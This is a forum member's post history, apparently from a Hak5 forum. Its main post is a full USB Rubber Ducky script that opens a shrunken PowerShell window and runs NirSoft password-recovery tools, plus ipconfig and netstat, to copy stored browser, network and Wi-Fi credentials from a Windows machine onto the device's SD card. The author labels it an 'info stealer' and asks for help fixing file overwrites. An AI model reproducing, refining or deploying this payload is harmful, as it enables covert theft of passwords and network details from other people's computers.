Jump to content

Borgirc

Members
  • Posts

    4
  • Joined

  • Last visited

Everything posted by Borgirc

  1. tnx m8 im gone play around with it i think this will fix my problem:-)
  2. hi guys and girls how can i fix my first script so it does not override the txt files ? dis is what i came up with sofare REM tnx 2 Hak5derren for the helpful videos and code ;-) REM Author Borgirc REM stored passwords and info stealer win 7 FOR TWIN DUCKY REM name the sd DUCKY and create a folder named passwords on the sd card REM it will store all the info in text files in the passwords folder on the sd card REM get WebBrowserPassView and netpass and WirelessKeyView at http://www.nirsoft.net REM copy WebBrowserPassView.exe + netpass.exe + WirelessKeyView on sd of the twin ducky DELAY 1000 GUI R DELAY 100 STRING POWERSHELL ENTER DELAY 1000 ALT F4 DELAY 100 STRING mode con:cols=18 lines=1 ENTER DELAY 100 STRING $usbpath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name ENTER DELAY 100 STRING CD $usbpath.name ENTER DELAY 100 STRING ./WebBrowserPassView /stext passwords/Password_MAIL.txt ENTER DELAY 100 STRING ./netpass /stext passwords/Password_PC.txt ENTER DELAY 100 STRING ./WirelessKeyView /stext passwords/wifi-pass.txt ENTER DELAY 100 STRING ipconfig /all | out-file passwords/ipconfig.txt ENTER DELAY 100 STRING netstat | out-file passwords/netstat.txt ENTER DELAY 100 STRING exit ENTER
×
×
  • Create New...